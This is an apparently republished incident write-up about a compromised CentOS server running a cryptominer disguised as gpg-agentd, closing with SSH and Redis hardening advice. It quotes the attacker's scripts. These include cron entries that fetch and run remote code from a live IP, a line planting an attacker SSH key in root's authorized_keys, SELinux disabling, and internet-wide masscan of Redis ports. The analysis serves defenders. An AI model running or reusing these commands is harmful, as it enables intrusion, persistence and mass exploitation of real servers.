Unmasking the gpg‑agentd Malware: From Server Freeze to Full‑Scale Attack
This article walks through a real‑world compromise of an Alibaba Cloud server, detailing how a disguised gpg‑agentd process was used to install backdoors, hijack SSH keys, exploit Redis, and launch mass scanning with malicious scripts, and it concludes with practical hardening recommendations.
0x00 Background
On a Monday morning the author discovered a server that could not be logged into; the operations team said Alibaba Cloud had frozen it for malicious outbound traffic. After a failed SSH attempt on port 22, the port was changed, revealing a root login with a weak password, indicating a breach.
0x01 Finding Clues
The CentOS 6.x server ran nginx, tomcat, redis and other services. After backing up the databases, the author noticed two processes named gpg-agentd consuming 99% CPU.
Google search showed that GPG’s gpg-agent can support SSH, which seemed legitimate, but the trailing "d" suggested a disguised malicious binary.
GPG provides a gpg‑agent that supports the SSH protocol, simplifying key management.
Running the following command revealed the process details:
ps eho command -p 23374netstat -pan | grep 23374The investigation raised two questions:
1. How was the file uploaded? 2. What is its purpose?
History logs were cleared, leaving no trace. Further inspection of cron jobs showed a scheduled task that downloaded a script every 15 minutes.
Running crontab -e confirmed the malicious entry.
crontab -eThus the clue was found.
0x02 Motive
The cron job downloads and executes a script from 159.89.190.243/ash.php every 15 minutes. curl -fsSL 159.89.190.243/ash.php > ash.sh The script content is:
uname -aidhostnamesetenforce 0 2>/dev/nullulimit -n 50000ulimit -u 50000crontab -r 2>/dev/nullrm -rf /var/spool/cron/* 2>/dev/nullmkdir -p /var/spool/cron/crontabs 2>/dev/nullmkdir -p /root/.ssh 2>/dev/nullecho 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0+xigBIrdgo2p5nBtrpYZ2/GN3+ThY+PNUqx redisX' > /root/.ssh/authorized_keys
echo '*/15 * * * * curl -fsSL 159.89.190.243/ash.php|sh' > /var/spool/cron/root
echo '*/20 * * * * curl -fsSL 159.89.190.243/ash.php|sh' > /var/spool/cron/crontabs/root
yum install -y bash 2>/dev/nullapt install -y bash 2>/dev/nullapt-get install -y bash 2>/dev/nullbash -c 'curl -fsSL 159.89.190.243/bsh.php|bash' 2>/dev/nullThe script disables SELinux, adds an SSH public key for password‑less root login, installs bash, and then fetches a second script bsh.php.
The second script ( bsh.php) performs the following actions:
sleep $( seq 3 7 | sort -R | head -n1 )
... (omitted for brevity) ...
curl -sL -o x1.tar.gz https://github.com/robertdavidgraham/masscan/archive/1.0.4.tar.gz
... (install masscan) ...
curl -fsSL 159.89.190.243/rsh.php|bashIts four main functions are:
1. Download remote code and make it executable. 2. Modify rc.local for persistence. 3. Download the open‑source scanner masscan and install dependencies. 4. Download and run a third malicious script.
Masscan is described as a fast Internet port scanner capable of scanning the entire Internet in under six minutes, sending up to ten million packets per second.
MASSCAN: Mass IP port scanner – the fastest Internet port scanner, able to scan the whole Internet in under 6 minutes, transmitting 10 million packets per second.
The third script leverages a Redis misconfiguration to write SSH keys to the filesystem, then uses masscan to discover vulnerable Redis instances (default port 6379) across the Internet, harvesting them for further compromise.
setenforce 0 2>/dev/nullulimit -n 50000ulimit -u 50000
... (Redis configuration and masscan commands) ...
masscan --max-rate 10000 -p6379,6380 --shard $( seq 1 22000 | sort -R | head -n1 )/22000 --exclude 255.255.255.255 0.0.0.0/0 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .shards
... (further scanning loops) ...
rm -rf .dat .shard .ranges .lan 2>/dev/nullThis demonstrates how the attacker gains persistent root access, spreads binaries, and uses Redis write‑through vulnerabilities to propagate the malware at scale.
0x03 Summary
Analyzing the three scripts reveals a chain: the attacker first injects an SSH public key, then downloads and runs remote binaries, and finally exploits an unauthenticated Redis instance to propagate across the Internet. The initial compromise likely stemmed from a brute‑forced root password, as evidenced by numerous lastb entries.
The mysterious gpg-agentd process appears to be a cryptocurrency miner, as strings related to Bitcoin and Ethereum were found, and the attacker references NiceHash mining pools.
0x04 Security Recommendations
Server
1. Disable direct root login. 2. Use complex usernames and passwords. 3. Change the default SSH port. 4. Install tools like DenyHosts to block brute‑force attempts. 5. Disable password authentication; use RSA keys only.
Redis
1. Disable public IP binding (no 0.0.0.0). 2. Require authentication passwords. 3. Run Redis under a low‑privilege account.
The author notes that the analysis may contain omissions and invites feedback.
Signed-in readers can open the original source through BestHub's protected redirect.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactand we will review it promptly.
Efficient Ops
This public account is maintained by Xiaotianguo and friends, regularly publishing widely-read original technical articles. We focus on operations transformation and accompany you throughout your operations career, growing together happily.
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.